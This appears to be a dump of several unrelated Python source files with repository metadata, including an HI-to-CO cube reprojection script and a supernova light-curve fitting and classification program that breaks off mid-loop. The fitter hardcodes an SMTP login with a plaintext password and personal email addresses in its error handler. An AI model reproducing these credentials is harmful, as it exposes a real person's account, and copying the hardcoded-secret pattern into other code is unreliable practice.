if sys.version_info >= (3, 5):
return ast.Call(**kw)
else:
return ast.Call(starargs=None, kwargs=None, **kw)
def get_starargs(callsite):
if not isinstance(callsite, ast.Call):
raise ValueError("ast.Call expected, got %s" % type(callsite))
if sys.version_info >= (3, 5):
for arg in callsite.args:
if isinstance(arg, ast.Starred):
return arg.value
return None
else:
return callsite.starargs
def get_keywords(callsite):
if not isinstance(callsite, ast.Call):
raise ValueError("ast.Call expected, got %s" % type(callsite))
keywords = callsite.keywords
if sys.version_info < (3, 5) and callsite.kwargs is not None:
keywords = keywords.copy()
keywords.append(ast.keyword(arg=None, value=callsite.kwargs))
return keywords
def get_varkeywords(callsite):
if not isinstance(callsite, ast.Call):
raise ValueError("ast.Call expected, got %s" % type(callsite))
if sys.version_info >= (3, 5):
for arg in callsite.keywords:
if arg.arg is None:
return arg.value
return None
else:
return callsite.kwargs
|
mit
| -3,791,908,399,633,060,400
| 31.456113
| 80
| 0.568455
| false
| 4.100396
| false
| false
| false
|
e-koch/VLA_Lband
|
17B-162/HI/analysis/convolve_and_match_aca.py
|
1
|
3926
|
'''
Reproject onto the ACA CO(2-1) mosaic.
Since we have different versions of the full mosaic, we're
only going to make two version of the reprojected HI maps:
1) One to the ACA map without the highly asymmetric beam mosaics.
The HI map will not be convolved to a matching beam since they are already
quite similar. (But this can be checked later)
2) One to the full ACA map and convolved to its round beam of ~11 arcsec.
Also, these are just spatial reprojections, not spectral. So the CO
channel width won't matter.
'''
import os
from os.path import join as osjoin
from cube_analysis.reprojection import reproject_cube
from cube_analysis.run_pipe import run_pipeline
from paths import (seventeenB_HI_data_1kms_wGBT_path,
seventeenB_1kms_wGBT_HI_file_dict, aca_co21_data_path)
out_folder = seventeenB_HI_data_1kms_wGBT_path("aca_co21_match",
no_check=True)
if not os.path.exists(out_folder):
os.mkdir(out_folder)
run_noasymm = True
run_fullmos_round = True
if run_noasymm:
out_name = seventeenB_1kms_wGBT_HI_file_dict['Cube'].split("/")[-1].rstrip(".fits") + \
".aca_excasymm_spatialmatch.fits"
targ_cube = aca_co21_data_path("full_mosaic/12CO21/M33_ACA_12CO21_2p6kms_excludeasymmbeams_commonbeam.image_K.fits")
reproject_cube(seventeenB_1kms_wGBT_HI_file_dict['Cube'],
targ_cube,
out_name,
output_folder=out_folder,
save_spectral=False,
is_huge=True,
reproject_type='spatial',
common_beam=False,
verbose=True,
chunk=40)
run_pipeline(osjoin(out_folder, out_name),
out_folder,
masking_kwargs={"method": "ppv_connectivity",
"save_cube": True,
"is_huge": True,
"smooth_chans": 6,
"min_chan": 4,
"peak_snr": 4.,
"min_snr": 2,
"edge_thresh": 1,
"verbose": True,
},
moment_kwargs={"num_cores": 1,
"verbose": False,
"chunk_size": 1e5,
"make_peakvels": False},)
if run_fullmos_round:
out_name = seventeenB_1kms_wGBT_HI_file_dict['Cube'].split("/")[-1].rstrip(".fits") + \
".aca_fullmosaic_spatialmatch.fits"
targ_cube = aca_co21_data_path("full_mosaic/12CO21/M33_ACA_12CO21_2p6kms_fullmosaic_roundbeam.image_K.fits")
reproject_cube(seventeenB_1kms_wGBT_HI_file_dict['Cube'],
targ_cube,
out_name,
output_folder=out_folder,
save_spectral=False,
is_huge=True,
reproject_type='spatial',
common_beam=True,
verbose=True,
chunk=40)
run_pipeline(osjoin(out_folder, out_name),
out_folder,
masking_kwargs={"method": "ppv_connectivity",
"save_cube": True,
"is_huge": True,
"smooth_chans": 6,
"min_chan": 4,
"peak_snr": 4.,
"min_snr": 2,
"edge_thresh": 1,
"verbose": True,
},
moment_kwargs={"num_cores": 1,
"verbose": False,
"chunk_size": 1e5,
"make_peakvels": False},)
|
mit
| 4,816,399,364,986,148,000
| 35.018349
| 120
| 0.47784
| false
| 3.871795
| false
| true
| false
|
mdepasca/miniature-adventure
|
miniature_adventure.py
|
1
|
51544
|
import argparse
import os
from os import path
import subprocess
import sys
import socket
import time
import warnings
from math import floor
import gc # garbage collector
import smtplib
import numpy as np
from scipy import signal, linalg
from matplotlib import pyplot as plt
import GPy
import classes as cls
import utilities as util
from utilities import bcolors
# import rpy2.robjects as ro
# from rpy2.robjects.packages import importr
# from rpy2.robjects.numpy2ri import numpy2ri
# # Activate automatic conversion of ndarray to R objects
# ro.conversion.py2ri = numpy2ri
from progressbar import ProgressBar, SimpleProgress, ETA, Percentage, Bar, \
AnimatedMarker, Timer, Counter
if __name__ == "__main__":
# gc.set_debug(gc.DEBUG_LEAK)
# Parsing input from command line
parser = argparse.ArgumentParser(
description = "SN lightcurve fitter and classifier.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
actionGroup = parser.add_argument_group('ACTION')
inputGroup = parser.add_argument_group('INPUT')
"""
ACTION OPTIONS
----------------------------------------------------------------------------
"""
actionGroup.add_argument(
"--fit", dest="fit",
action="store_true",
help="Fit lightcurves with Gaussian processes method."
)
actionGroup.add_argument(
'--prior', dest='prior',
action='store_true', help='Use priors in GP regression.'
)
actionGroup.add_argument(
'--length', dest='testLength',
action='store_true',
help='Set length scale hyper parameter to random value to ease \
optimization.'
)
actionGroup.add_argument(
"--cross-correlation", dest="crossCor",
action="store_true",
help="Performs cross correlation between non peaked lcs (with maximum in \
r-band at one of the MJD extremes) and all the peaked lcs. Produces \
an estimate for maximum in r-band. VERY TIME CONSUMING."
)
actionGroup.add_argument(
"--distance-matrix", dest="distMatrix",
action="store_true",
help="Calculate distance between fitted lightcurves in same band. \
It is use to build a diffusion map (see Coifman & Lafon (2006) \
and Lafon & Lee (2006)).")
actionGroup.add_argument(
"--diffuse", dest="diffuse",
action="store_true",
help="Computes the diffusion map coefficients. Run together or after \
--distance-matrix option. Uses `diffusionMap` R package developed \
by Joseph Richards.")
actionGroup.add_argument(
"--train", dest="train",
action="store_true",
help="Train the classifier - Random Forest. Uses `randomForest` R \
package.")
actionGroup.add_argument(
"--classify", dest="classify",
action="store_true")
actionGroup.add_argument(
"--plot", dest="plot",
action="store_true",
help="Save on `pdf` file the plot of fitting curve over data.")
actionGroup.add_argument(
'--nice-plots', dest='nicePlots',
action='store_true',
help='Produces plot suitable for publication (pdf, 300dpi).'
)
"""-------------------------------------------------------------------------
INPUT OPTIONS
----------------------------------------------------------------------------
"""
inputGroup.add_argument(
"--data-directory", dest="dirData",
default="train_data" + os.sep + "SIMGEN_PUBLIC_DES",
help="Path to directory containing training data.")
inputGroup.add_argument(
"--fit-directory", dest="dirFit",
default="results" + os.sep + "FIT",
help="Path to directory containing fitted data.")
# the use of this keyword is developed in dev_magnitudes branch
inputGroup.add_argument(
"--mag", dest="mag",
action="store_true",
help="Reads in magnitudes from file."
)
inputGroup.add_argument(
"--fit-file", dest="fitFile",
help="Path to file in which to dump fitting results.")
inputGroup.add_argument(
"-f", "--file",
help="")
inputGroup.add_argument(
"-c", "--candidate", dest="cand",
default=-1, type=int,
help="ID of a candidate."
)
inputGroup.add_argument(
"--all-bands", dest="allBands",
action="store_true",
help="Plot all bands --nice-plots option."
)
inputGroup.add_argument(
"-b", "--band", dest="band", default='r',
help="Which band to plot with --nice-plots.")
inputGroup.add_argument(
"--nBands", dest="nBands",
default=-1, type=int,
help="Number of bands to plot with --nice-plots.")
inputGroup.add_argument(
'--limits', nargs=2, dest='limits',
default=[0, 5], type=int,
help='Starting ending indeces for fitting and cross-correlation.'
)
inputGroup.add_argument(
'--offset', '-o', dest='offset',
default=0, type=int,
help='Offset for columns WRT limits (which are referred to rows).'
)
inputGroup.add_argument(
'--plot-offset', dest='plotOffset',
default=-1, type=int,
help='Offset in index to begin light curves plotting from.'
)
"""-------------------------------------------------------------------------
"""
args = parser.parse_args()
bands = ['g', 'r', 'i', 'z']
else:
pass
if __name__ == "__main__":
# os.system("clear")
fromAddress = 'mothra@oapd.inaf.it'
toAddress = 'marco.depa@gmail.com'
sent = False
indent = " "
resDir = "results"+os.sep
peakIdx = np.empty(0)
nopeakIdx = np.empty(0)
print bcolors.bldpur
print indent + "* * * * * * * * * * * * * * *"
print indent + "* Miniature Adventure *"
print indent + "* ------------------- *"
print indent + "* lightcurves fitting *"
print indent + "* and *"
print indent + "* SN classification *"
print indent + "* * * * * * * * * * * * * * *"
print bcolors.txtrst
if args.dirFit == 'results/FIT':
yesno = str(raw_input(indent + 'Set fit directory other then default (' + \
parser.get_default('dirFit') + ')? (y/n)'))
if yesno == 'y':
args.dirFit = str(raw_input(indent + 'Specify new directory '\
+'for fit: '))
if args.dirData[-1] != os.sep:
args.dirData += os.sep
if args.dirFit[-1] != os.sep:
args.dirFit += os.sep
print indent + 'Fit directory will be: ' + path.abspath(args.dirFit)
if not os.path.exists(path.abspath(args.dirFit)):
os.makedirs(path.abspath(args.dirFit))
start_time = time.time()
"""
Get list of files in data directory and fit directory
----------------------------------------------------------------------------
"""
p = subprocess.Popen("ls *SN*.DAT", shell=True, stdout=subprocess.PIPE,
cwd=args.dirData)
lsDirData = p.stdout.read()
lsDirData = lsDirData.split('\n')
lsDirData.sort()
lsDirData.remove('')
p = subprocess.Popen("ls *SN*.DAT", shell=True, stdout=subprocess.PIPE,
cwd=args.dirFit)
lsDirFit = p.stdout.read()
lsDirFit = lsDirFit.split('\n')
lsDirFit.sort()
lsDirFit.remove('')
"""-------------------------------------------------------------------------
"""
"""
PERFORMS LCs FITTING
"""
if args.fit:
if args.limits[1] > len(lsDirData):
print indent + \
"WARNING: upper limit > than the number of files. Corrected.\n"
args.limits[1] = len(lsDirData)
filePath = args.dirFit + 'PEAKED_{:<}_{:<5.3f}.LIST'.format(
socket.gethostname(), time.time()
)
fPeaked = open(filePath, 'w')
filePath = args.dirFit + 'NOPEAKED_{:<}_{:<5.3f}.LIST'.format(
socket.gethostname(), time.time()
)
fNopeaked = open(filePath, 'w')
# Relevant input data
print "\n" + indent + "[1] * Fit lightcurves ..."
print "\n" + indent + "Index interval [{:<},{:<})".format(
args.limits[0], args.limits[1]
)
print "\n" + indent + \
"Data directory: " + os.curdir + args.dirData
print "\n" + indent \
+ "Number of candidates = {:<d}".format(len(lsDirData))
"""
GP kernel specification
------------------------------------------------------------------------
"""
# kern = GPy.kern.RatQuad(1)
kern = GPy.kern.RBF(1)
# kern = GPy.kern.Matern32(1)
# kern = GPy.kern.Matern52(1)
"""---------------------------------------------------------------------
"""
print "\n" + indent \
+ "Data will be smoothed using GP kernel " + kern.name.upper()
print '\n' + indent + \
"INDEX | SN ID | BAND"
for i in range(args.limits[0], args.limits[1]):
filePath = path.splitext(lsDirData[i])[0] + "_FIT.DAT"
"""
Check if file with fit results already exits. If positive skip
to next loop iteration.
"""
if filePath in lsDirFit:
continue
candidate = util.get_sn_from_file(
args.dirData + lsDirData[i],
args.mag
)
# Creating SupernovaFit object
candidateFit = cls.SupernovaFit(candidate, kern.name)
for b in candidate.lcsDict.keys():
# Correcting for time dilution
epoch = util.time_correct(
candidate.lcsDict[b].mjd,
candidate.zSpec if candidate.zSpec else candidate.zPhotHost
)
# Correcting for absorption
flux = util.correct_for_absorption(
candidate.lcsDict[b].flux,
candidate.MWEBV, b
)
errFlux = candidate.lcsDict[b].fluxErr
if (candidate.lcsDict[b].badCurve) or (len(flux) <= 3):
candidateFit.lcsDict[b].badCurve = True
print indent + bcolors.FAIL + \
"{:<} {:<} {:<} Bad Curve".format(i, candidate.SNID, b) + \
bcolors.txtrst
"""
>>> if 'break' instead of 'continue' the candidate would not be
>>> processed and the further code would be easier (no double
>>> checks both on data and fit).
"""
continue
"""
Fitting Lightcurve
----------------------------------------------------------------
"""
try:
predMjd, predFlux, predErr, GPModel = util.gp_fit(
epoch, flux, errFlux,
kern, n_restarts=10,
parallel=False,
test_length=args.testLength,
test_prior=args.prior)
except linalg.LinAlgError as e:
if sent == False:
server = smtplib.SMTP('mailauth.oapd.inaf.it',587)
server.starttls()
server.login('marco.depascale', 'M@p3d_8$')
msg = 'Subject: LinAlgError\n\n' + \
'index = {:<d}, SNID = {:<d}'.format(i, candidate.SNID)
server.sendmail(fromAddress, toAddress, msg)
server.close()
sent = True
"""
if LinAlgError light curve won't be saved.
"""
print indent + \
"{:>5d} {:>5d} {:>4s} > FAIL".format(
i, candidate.SNID, b
) + bcolors.FAIL + ' LinAlgError' + bcolors.txtrst
candidateFit.r.badCurve = True
raise ValueError(
'LinAlgError from GPy. Mail sent to {:s}'.format(
toAddress
)
)
else:
candidateFit.set_lightcurve(b, predMjd, predFlux, predErr)
print indent + bcolors.OKGREEN + \
"{:>5d} {:>5d} {:>4s} > DONE".format(
i, candidate.SNID, b
) + bcolors.txtrst
"""-------------------------------------------------------------
"""
else:
"""
Saving fit results on file
----------------------------------------------------------------
"""
if (candidateFit.r.badCurve == False):
filePath = args.dirFit + \
path.splitext(lsDirData[i])[0] + "_FIT.DAT"
candidateFit.save_on_txt(filePath)
print indent + 'file saved!'
if candidateFit.peaked:
peakIdx = np.append(peakIdx, i)
fPeaked.write('{:<}\n'.format(filePath))
else:
nopeakIdx = np.append(nopeakIdx, i)
fNopeaked.write('{:<}\n'.format(filePath))
"""-------------------------------------------------------------
"""
gc.collect()
# free memory
gc.collect()
fPeaked.close()
fNopeaked.close()
filePath = 'peaked_{:<}_{:<5.3f}.dat'.format(
socket.gethostname(), time.time()
)
np.savetxt(args.dirFit + filePath, peakIdx,
header='Indexes of fitted LCs with r maximum.', fmt='%d')
filePath = args.dirFit + 'nopeaked_{:<}_{:<5.3f}.dat'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, nopeakIdx,
header='Indexes of fitted LCs without an r maximum.', fmt='%d')
gc.collect()
"""#########################################################################
############################################################################
PERFORMING CROSS-CORRELATION
############################################################################
############################################################################
"""
if args.crossCor:
"""
File are sorted by SNID.
In the following peakIdx and nopeakIdx contain index referring to the
full list of files. For this reason the list of files it is queried on
dirData. It is then filtered using the above variables.
"""
print "\n" + indent + bcolors.undwht + \
"(*) Calculate cross-correlation of not peaked- with " + \
"peaked-lcs ..." + bcolors.txtrst
print "\n" + indent + "Interval [{:<},{:<})".format(args.limits[0], args.limits[1])
filePath = args.dirFit + 'PEAKED.LIST'
if path.exists(filePath) == False:
# create the file concatenating existing partial files
print '{:<s} created!'.format(filePath)
peakedFileList = util.list_files(args.dirFit+'PEAKED*.LIST')
util.concat_files(peakedFileList, filePath)
peakList = np.loadtxt(filePath, dtype=np.str)
filePath = args.dirFit + 'NOPEAKED.LIST'
if path.exists(filePath) == False:
# create the file from existing partial files
print '{:<s} created!'.format(filePath)
noPeakedFileList = util.list_files(args.dirFit+'NOPEAKED*.LIST')
util.concat_files(noPeakedFileList, filePath)
tmp = np.loadtxt(filePath, dtype=np.str)
if tmp.size == 1:
nopeakList = np.asarray([tmp])
else:
nopeakList = np.asarray(tmp)
if args.limits[1] > len(nopeakList):
args.limits[1] = len(nopeakList)
#
# filePath = 'repeats.txt'
# repeats = np.loadtxt(args.dirFit + filePath, dtype=np.str)
filePath = 'cross_correlated_files_{:<5.3f}.dat'.format(time.time())
reWrite = open(args.dirFit + filePath, 'w')
prog = 0
for i in nopeakList[args.limits[0]:args.limits[1]]:
z = 0 # goes on peakIdx to index the progress bar
"""
READ DATA FROM NOT-PEAKED FILE
creates a Supernova object
"""
filePath = i
try:
tmpSN = util.get_sn_from_file(filePath)
print "Progress: {:<d} -- {:<}".format(prog, filePath)
prog += 1
ccIndent = "ID:{: ^7d}".format(tmpSN.SNID)
widgets = [ccIndent, Percentage(), ' ',
Bar(marker='#',left='[',right=']'),
' ', ETA()]
pbar = ProgressBar(widgets=widgets, maxval=len(peakList)).start()
except IOError:
print "IOError: {:<}".format(filePath)
continue
if tmpSN.r.badCurve:
print "IOError (BAD r curve): {:<}".format(filePath)
continue
"""
create SupernovaFit object
"""
notPeaked = cls.SupernovaFit(tmpSN)
for l in tmpSN.lcsDict.keys():
notPeaked.set_lightcurve(l,
tmpSN.lcsDict[l].mjd,
tmpSN.lcsDict[l].flux,
tmpSN.lcsDict[l].fluxErr
)
"""
Shifting mjds in not-peaked
"""
notPeaked.shift_mjds()
ccMax = list()#np.zeros(peakIdx.size)
k = 0 # goes on ccMax
# for j in peakIdx:
for j in peakList:
"""
READ DATA FROM PEAKED FILE
"""
# if j in repeats:
# print indent + bcolors.WARNING + \
# 'File appears also in unpeaked list: ignoring it.' + \
# bcolors.txtrst
# continue
filePath = j#args.dirFit + lsDirData[j][0:12] + '_FIT.DAT'
try:
tmpSN = util.get_sn_from_file(filePath)
except IOError:
print indent + bcolors.WARNING + \
'File appears also in peaked list but it does not exists: ignoring it.' + \
bcolors.txtrst
continue
if tmpSN.r.badCurve:
print indent + bcolors.WARNING + \
'Peaked file has bad r curve: ignoring it.' + \
bcolors.txtrst
continue
peaked = cls.SupernovaFit(tmpSN)
for l in tmpSN.lcsDict.keys():
peaked.set_lightcurve(l,
tmpSN.lcsDict[l].mjd,
tmpSN.lcsDict[l].flux,
tmpSN.lcsDict[l].fluxErr
)
"""
Shifting mjds in peaked
"""
peaked.shift_mjds()
"""
Performing cross-correlation
"""
ycorr = signal.correlate(
notPeaked.normalized_flux('r'),
peaked.normalized_flux('r')
)
xcorr = np.arange(ycorr.size)
lags = xcorr - (
len(notPeaked.normalized_flux('r'))-1
)
distancePerLag = (
notPeaked.r.shiftedMjd[-1] - \
notPeaked.r.shiftedMjd[0])/float(
len(notPeaked.r.shiftedMjd)
)
offsets = -lags*distancePerLag
# ccMax[k] = offsets[np.argmax(ycorr)]
ccMax.append(offsets[np.argmax(ycorr)])
# k += 1
pbar.update(z+1)
z += 1
# gc.collect()
notPeaked.ccMjdMaxFlux = np.mean(ccMax)#ccMax.mean()
"""
re-writing file of not peaked lc to include information on maximum
position from CC.
"""
filePath = i#args.dirFit + lsDirData[i][0:12] + '_FIT.DAT'
notPeaked.save_on_txt(filePath)
reWrite.write(filePath+'\n')
pbar.finish()
# gc.collect()
reWrite.close()
print 'CC ended!'
gc.collect()
"""
CALCULATING DISTANCE MATRIX
needs:
- args.distMatrix
- args.limits
- args.offset
- args.dirFit
"""
if args.distMatrix:
if not os.path.exists(path.abspath(args.dirFit + 'distance_matrix' + os.sep)):
os.makedirs(path.abspath(args.dirFit + 'distance_matrix' + os.sep))
"""
Calculate distance between fitted lightcurves.
Distance values are saved in a R matrix. This will be used by the R
package `diffusionMap` through rpy2 Python package.
"""
j_offset = args.offset
i_start = args.limits[0]
i_end = args.limits[1]
j_start = i_start + j_offset
j_end = (i_end + j_offset) if (i_end+j_offset<=len(lsDirFit)) else len(lsDirFit)
print "\n" + indent + bcolors.undwht + \
"(*) Calculate distances between lightcurves ..." + \
bcolors.txtrst
print indent + "Rows in [{:<d}, {:<d})".format(i_start, i_end)
print indent + "Cols in [{:<d}, {:<d})".format(j_start, j_end)
"""
setting value for big distance
"""
distFlag = 5
missColCount = 0
missRowlist = list()
bandDict = {
'g':0,
'r':1,
'i':2,
'z':3
}
widgets = [indent, 'Processing:', ' ', Counter(), ' ',
AnimatedMarker(), indent, Timer()]
# creating list of 4 lists
distList = list([[], [], [], []])
nCols = 0
# distList = np.zeros((4,
# len(lsDirFit[i_start:i_end]), len(lsDirFit[i_start:i_end])),
# dtype=float
# )
pbar = ProgressBar(widgets=widgets, maxval=(i_end-i_start)).start()
for i in range(i_start, i_end):
missColCount = 0
"""
Reading in i-candidate
"""
tmpSN = util.get_sn_from_file(
args.dirFit+lsDirFit[i]
)
if tmpSN.r.badCurve:
# nothing has to be added to the distance matrix. Print and
#
# continue to nex object
# print "{:<} Has bad curve in r band - ".format(lsDirFit[i]) + \
# "THE FILE HAS TO BE DELETED" +\
# " indices {:<d}".format(i)
missRowlist.append(i)
continue
iCandidate = cls.SupernovaFit(tmpSN)
for b in tmpSN.lcsDict.keys():
# set_lightcurve set also if the lc is peaked or not
iCandidate.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr
)
"""
Shifting mjds in i-candidate
"""
iCandidate.shift_mjds()
if iCandidate.peaked == False:
# print i, iCandidate.SNID
"""
keeping to perform check with other non peaked LC
"""
iElMax = iCandidate.r.shiftedMjd.index(0.)
"""
correcting using CC results
"""
for b in bands:
iCandidate.lcsDict[b].shiftedMjd = [
iCandidate.lcsDict[b].shiftedMjd[l] +
iCandidate.ccMjdMaxFlux for l in range(len(
iCandidate.lcsDict[b].shiftedMjd
))
]
iElSize = iCandidate.r.size
iPeaked = iCandidate.peaked
for j in range(j_start, j_end):
"""
if this SN has badCurve in this band it will be far from all
the others by default.
here will save time from not opening all the other files
to create new SupernovaFit objcets.
"""
if j == i:
# filling elements on the distance matrix diagonal
for b in bands:
# adding one element to each sub list in distList
distList[bandDict[b]].append(0.)
# distList[bandDict[b], i-i_start, j-j_start] = 0.
continue
if j < i:
# filling matrix elements below the diagonal
if j in missRowlist:
missColCount += 1
continue
for b in bands:
# appending the symmetric element in the list: i-i_start
distList[bandDict[b]].append(
distList[bandDict[b]][
(j-j_start-missColCount)*nCols+\
i-i_start-len(missRowlist)
])
# distList[bandDict[b], i-i_start, j-j_start] = \
# distList[bandDict[b], j-j_start, i-i_start]
continue # jump to the next iteration of the loop
"""
Reading in j-candidate
"""
try:
tmpSN = util.get_sn_from_file(
args.dirFit+lsDirFit[j]
)
except IndexError:
print j, len(lsDirFit)
raise IndexError("list index out of range")
if tmpSN.r.badCurve:
# nothing has to be added to the distance matrix. Print and
#
# continue to nex object
# print "{:<} Has bad curve in r band -".format(lsDirFit[j])+\
# " THE FILE HAS TO BE DELETED:" +\
# " indices {:<d}, {:<d}".format(i, j)
continue
jCandidate = cls.SupernovaFit(tmpSN)
for b in tmpSN.lcsDict.keys():
jCandidate.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr
)
"""
Shifting mjds in j-candidate
"""
jCandidate.shift_mjds()
if jCandidate.peaked == False:
"""
keeping to perform check with other non peaked LC
"""
jElMax = jCandidate.r.shiftedMjd.index(0.)
"""
correcting using CC results
"""
for b in bands:
jCandidate.lcsDict[b].shiftedMjd = [
jCandidate.lcsDict[b].shiftedMjd[l] +
jCandidate.ccMjdMaxFlux for l in range(len(
jCandidate.lcsDict[b].shiftedMjd
))
]
jElSize = jCandidate.r.size
for b in bands:
if not jCandidate.lcsDict[b].badCurve \
and not iCandidate.lcsDict[b].badCurve:
distList[bandDict[b]].append(
iCandidate.get_distance(jCandidate, b)
)
# distList[bandDict[b], i-i_start, j-j_start] = \
# iCandidate.get_distance(jCandidate, b)
else:
# in case of bad curve
"""
This works like a flag. These elements will be set
equal to a neutral value (the mean of the other)
"""
distList[bandDict[b]].append(distFlag)
# distList[bandDict[b], i-i_start, j-j_start] = distFlag
"""
# >>> !! Checking for i being equal to its beginning value in the loop
does not take into account the
possibility of the first SN having a bad r curve, in which case
the loop will never arrive here, since it is reset by a continue.
Checking on nCols being still equal to zero is much better, since is
the only way to verify if the first loop has been completed.
"""
# if (i == i_start):
if (nCols == 0):
nCols = len(distList[0])
print 'nCols updated! {:<d}'.format(nCols)
pbar.update(i-i_start+1)
pbar.finish()
# del iCandidate
# del jCandidate
# del tmpSN
gc.collect()
distMatrix = np.zeros((4,
len(distList[0])/nCols, nCols),
dtype=float
)
for b in bands:
distMatrix[bandDict[b]] = np.reshape(
distList[bandDict[b]], (len(distList[bandDict[b]])/nCols, nCols)
)
"""
distList is no more used from now on. I delete it to save memory
"""
del distList
gc.collect()
# fixing flagged elements
# raise SystemExit
if distMatrix[0, distMatrix[0] == distFlag].size > 0:
ind = np.where(distMatrix[0] == distFlag)
distMatrix[0, ind[0], ind[1]] = np.add(
np.add(
distMatrix[1, ind[0], ind[1]],
distMatrix[2, ind[0], ind[1]]
),
distMatrix[3, ind[0], ind[1]]
)/3.
if distMatrix[1, distMatrix[1] == distFlag].size > 0:
ind = np.where(distMatrix[1] == distFlag)
# distMatrix[1, ind[0], ind[1]] = distMatrix[1,:,:].max()
distMatrix[1, ind[0], ind[1]] = np.add(
np.add(
distMatrix[0, ind[0], ind[1]],
distMatrix[2, ind[0], ind[1]]
),
distMatrix[3, ind[0], ind[1]]
)/3.
if distMatrix[2, distMatrix[2] == distFlag].size > 0:
ind = np.where(distMatrix[2] == distFlag)
# distMatrix[2, ind[0], ind[1]] = distMatrix[2].max()
distMatrix[2, ind[0], ind[1]] = np.add(
np.add(
distMatrix[0, ind[0], ind[1]],
distMatrix[1, ind[0], ind[1]]
),
distMatrix[3, ind[0], ind[1]]
)/3.
if distMatrix[3, distMatrix[3] == distFlag].size > 0:
ind = np.where(distMatrix[3] == distFlag)
# distMatrix[3, ind[0], ind[1]] = distMatrix[3].max()
distMatrix[3, ind[0], ind[1]] = np.add(
np.add(
distMatrix[0, ind[0], ind[1]],
distMatrix[1, ind[0], ind[1]]
),
distMatrix[2, ind[0], ind[1]]
)/3.
distMatrixSum = np.sum(distMatrix, 0)
"""
Saving on text files
"""
fileHeader = "distMatrix[{:<d}:{:<d},{:<d}:{:<d}] --- ".format(
i_start, i_end, j_start, j_end
) + \
"Created by {:<}".format(socket.gethostname())
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_Sum_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrixSum, fmt='%6.4f', header=fileHeader)
del distMatrixSum
gc.collect()
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_g_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[0], fmt='%6.4f', header=fileHeader)
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_r_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[1], fmt='%6.4f', header=fileHeader)
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_i_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[2], fmt='%6.4f', header=fileHeader)
filePath = args.dirFit + 'distance_matrix' + os.sep + \
'dist_matrix_z_{:<}_{:<5.3f}.txt'.format(
socket.gethostname(), time.time()
)
np.savetxt(filePath, distMatrix[3], fmt='%6.4f', header=fileHeader)
del distMatrix
gc.collect()
"""
CALCULATING DIFFUSION MAP
"""
if args.diffuse:
if 'diffusionMap' not in globals():
diffusionMap = importr('diffusionMap')
ndim = ro.r.attributes(Rmatrix)[0][0]
dmap = diffusionMap.diffuse(Rmatrix, neigen=5)
util.dump_pkl('diffusion_map.pkl', dmap)
"""
TRAINING RANDOM FOREST CLASSIFIER
"""
if args.train:
randomForest = importr('randomForest')
if 'dmap' not in globals():
print indent + 'Loading catalog from dump file ...'
dmap = util.open_pkl('tmp_diffusion_map.pkl')
dmap_rf = randomForest.randomForest(dmap)
"""
PLOT OBSERVATION AND FIT
--plot
"""
if args.plot:
timeMark = time.time()
"""
getting file list from directory
File will be sorted by SNID
"""
print indent + 'Plotting ...'
'''
Column index is always increasing, no check on its value.
'''
nrows = 5
ncols = 5
"""
If plotOffset is to specified, get a proper random value
"""
if (args.plotOffset == -1):
np.random.RandomState
offset = int(np.random.uniform(low=0, high=len(lsDirFit)-nrows*ncols))
else:
offset = args.plotOffset
fig_g, ax_g = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
#tight_layout=True
)
fig_r, ax_r = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
#tight_layout=True
)
fig_i, ax_i = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
#tight_layout=True
)
fig_z, ax_z = plt.subplots(nrows=nrows, ncols=ncols,
figsize=(16.5, 11.7)#,
# tight_layout=True
)
dictFig = {'g':fig_g,
'r':fig_r,
'i':fig_i,
'z':fig_z}
dictAx = {'g':ax_g,
'r':ax_r,
'i':ax_i,
'z':ax_z}
r = {'g':0,
'r':0,
'i':0,
'z':0}
c = {'g':0,
'r':0,
'i':0,
'z':0}
"""
Adjust subplot margins and title
"""
for b in dictFig.keys():
dictFig[b].subplots_adjust(
top=0.96, right=0.99, bottom=0.03, left=0.02,
wspace=0.08, hspace=0.13
)
dictFig[b].suptitle('band {:<1} - offset {:<d}'.format(b, offset))
GPkern = ''
for i in range(nrows*ncols):
"""
Getting the observational data from file
"""
candidate = util.get_sn_from_file(
args.dirData + lsDirData[i+offset]#candidateIdx]
)
"""
Reading fit data from file
"""
try:
tmpSN = util.get_sn_from_file(
args.dirFit+lsDirFit[i+offset],
magFlag=args.mag,
)
except IndexError:
warnStr = 'IndexError: list index out of range. '+\
'i={:<d}.'.format(i+offset)
print warnings.warn(warnStr)
print '\n'+indent+'Saving files as they are and stopping.'
else:
"""
Initializing SupernovaFit object
"""
fit = cls.SupernovaFit(tmpSN,
tmpSN.kern if hasattr(tmpSN, 'kern') else None)
if (i == 0) and hasattr(tmpSN, 'kern'):
GPkern = tmpSN.kern
for b in tmpSN.lcsDict.keys():
fit.set_lightcurve(b,
tmpSN.lcsDict[b].mjd,
tmpSN.lcsDict[b].flux,
tmpSN.lcsDict[b].fluxErr,
magFlag=args.mag
)
if fit.r.badCurve:
print 'SN ID{:>06d} has bad r band light curve!'.format(
fit.SNID)
# continue
else:
"""
Shift fit mjd to have 0 at r band maximum
"""
fit.shift_mjds()
"""
Fixing shiftedMjd for not-peaked LCs
"""
if (fit.peaked == False) and (fit.r.badCurve == False) :
"""
correcting using CC results
"""
for b in bands:
fit.lcsDict[b].shiftedMjd = [
el + fit.ccMjdMaxFlux for el in fit.lcsDict[b].shiftedMjd
]
for b in dictAx.keys():
"""
variable `data` initialized as light curve in band b for
cleaner code.
"""
data = candidate.lcsDict[b]
fit_b = fit.lcsDict[b]
